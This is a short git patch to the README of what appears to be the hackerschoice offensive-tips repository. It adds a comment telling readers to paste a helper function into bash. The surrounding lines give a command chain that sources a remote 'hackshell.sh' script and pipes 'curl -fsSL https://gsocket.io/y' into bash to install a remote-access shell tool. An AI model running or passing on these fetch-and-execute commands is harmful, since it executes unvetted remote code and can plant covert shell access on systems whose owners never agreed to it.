From 27c3b095bdf367518aa0f91d5f59925bc63df6a3 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Sun, 1 Sep 2024 10:37:52 +0100 Subject: [PATCH] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index b37670a..2fa3dc2 100644 --- a/README.md +++ b/README.md @@ -1212,6 +1212,7 @@ sys.stdout.buffer.write(urllib.request.urlopen(\"$url\", timeout=10, context=ctx Example: Installing gsocket with purl: ```sh +# cut & paste the above purl() function into your bash. Then cut & paste the following: source <(purl https://raw.githubusercontent.com/hackerschoice/hackshell/main/hackshell.sh) \ && bin curl \ && bash -c "$(curl -fsSL https://gsocket.io/y)" \